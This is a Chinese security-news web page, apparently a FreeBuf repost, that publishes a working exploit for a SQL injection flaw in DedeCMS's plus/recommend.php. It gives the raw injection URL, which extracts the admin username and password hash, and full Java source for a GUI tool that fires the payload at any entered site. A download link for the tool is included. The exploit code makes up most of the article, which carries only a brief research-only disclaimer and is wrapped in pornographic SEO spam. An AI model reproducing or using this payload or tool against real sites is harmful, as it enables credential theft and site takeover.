成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

DedeCMS全版本通殺SQL注入漏洞利用代碼及工具

作者:千秋丶千年
安全 漏洞
近日,網友在dedecms中發現了全版本通殺的SQL注入漏洞,目前官方最新版已修復該漏洞。

dedecms即織夢(PHP開源網站內容管理系統)??棄魞热莨芾硐到y(DedeCms) 以簡單、實用、開源而聞名,是國內最知名的PHP開源網站管理系統,也是使用用戶最多的PHP類CMS系統。

DedeCMS全版本通殺SQL注入漏洞利用代碼及工具

近日,網友在dedecms中發現了全版本通殺的SQL注入漏洞,目前官方最新版已修復該漏洞,相關利用代碼如下:

EXP:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'

or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select

CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`

limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]

[type]=application/octet-stream&_FILES[type][size]=111

利用工具源碼(by 園長):

package org.javaweb.dede.ui;
  
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
  
/**
 *
 * @author yz
 */
public class MainFrame extends javax.swing.JFrame {
  
    private static final long serialVersionUID = 1L;
  
    /**
     * Creates new form MainFrame
     */
    public MainFrame() {
        initComponents();
    }
  
    public String request(String url){
        String str = "",tmp;
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
            while((tmp=br.readLine())!=null){
                str+=tmp+"\r\n";
            }
        } catch (Exception e) {
            jTextArea1.setText(e.toString());
        }
        return str;
    }
  
    private void initComponents() {
  
        jPanel1 = new javax.swing.JPanel();
        jLabel1 = new javax.swing.JLabel();
        jTextField1 = new javax.swing.JTextField();
        jButton1 = new javax.swing.JButton();
        jScrollPane1 = new javax.swing.JScrollPane();
        jTextArea1 = new javax.swing.JTextArea();
  
        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
  
        jLabel1.setText("URL:");
        jTextField1.setText("http://localhost");
  
        this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
  
        int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
        int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
  
        jButton1.setText("獲取");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });
  
        jTextArea1.setColumns(20);
        jTextArea1.setRows(5);
        jScrollPane1.setViewportView(jTextArea1);
  
        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
                        .addContainerGap()
                        .addComponent(jLabel1)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
                .addGap(0, 0, Short.MAX_VALUE))
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addContainerGap()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(jLabel1)
                    .addComponent(jTextField1,
 javax.swing.GroupLayout.PREFERRED_SIZE, 
javax.swing.GroupLayout.DEFAULT_SIZE, 
javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(jButton1))
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
        );
  
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
  
        pack();
    }// </editor-fold>                       
  
    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                        
        String url = jTextField1.getText();
        if(null==url||"".equals(url)){
            return ;
        }
        String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
        Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
        if(m.find()){
            String[] s = m.group(1).split("\\|");
            if(s.length>2){
                jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
            }
        }
    }                                       
  
    public static void main(String args[]) {
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new MainFrame().setVisible(true);
            }
        });
    }
  
    // Variables declaration - do not modify                    
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JScrollPane jScrollPane1;
    private javax.swing.JTextArea jTextArea1;
    private javax.swing.JTextField jTextField1;
    // End of variables declaration                  
}

利用工具下載地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!)

責任編輯:藍雨淚 來源: FreeBuf
DedeCMSSQL注入漏洞
相關推薦

2012-04-12 15:06:44

2023-12-01 16:21:42

2017-09-07 15:39:27

2014-12-04 15:01:13

2014-10-17 09:12:35

2024-05-27 09:04:05

2010-09-13 13:40:24

2016-09-28 16:38:47

2017-05-02 09:02:14

2012-12-19 10:36:06

2010-09-09 17:22:14

2009-02-12 10:14:16

2010-10-22 15:18:18

SQL注入漏洞

2009-11-02 13:47:09

2009-10-25 13:32:09

2021-09-16 09:05:45

SQL注入漏洞網絡攻擊

2012-04-12 13:36:59

2023-07-26 17:13:38

2012-11-15 13:37:32

dedecms注入腳本攻防

2024-05-08 16:32:35

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久精品亚洲精品国产欧美 | 欧美日韩午夜精品 | 欧美性大战xxxxx久久久 | 欧美精品中文字幕久久二区 | 日韩一级黄色毛片 | 性xxxxx | 国产成人精品a视频一区www | 精品久久久久久久久久久久久久久久久 | 国产视频中文字幕在线观看 | 欧美一级二级在线观看 | 中国美女撒尿txxxxx视频 | 在线国产一区二区 | 午夜影院 | 国产成人免费 | 精品1区 | 日韩精品在线看 | 99精品国产一区二区三区 | 国产精品一区二区三 | 久久久精彩视频 | 免费电影av | av大片 | 91久久久精品国产一区二区蜜臀 | 精品久久久久久久久久久久久久 | 亚洲入口 | 午夜视频在线 | www狠狠干 | 亚洲 欧美 另类 综合 偷拍 | 日本在线中文 | 国产又爽又黄的视频 | 成人免费av在线 | 三级视频在线观看电影 | 夜夜爽99久久国产综合精品女不卡 | 在线成人一区 | 成人av网站在线观看 | 奇米四色在线观看 | 欧美一区二区三区在线播放 | 99国产精品视频免费观看一公开 | 成人在线免费视频 | 亚洲三区在线观看 | 久久亚洲一区二区三 | 亚洲成av人影片在线观看 |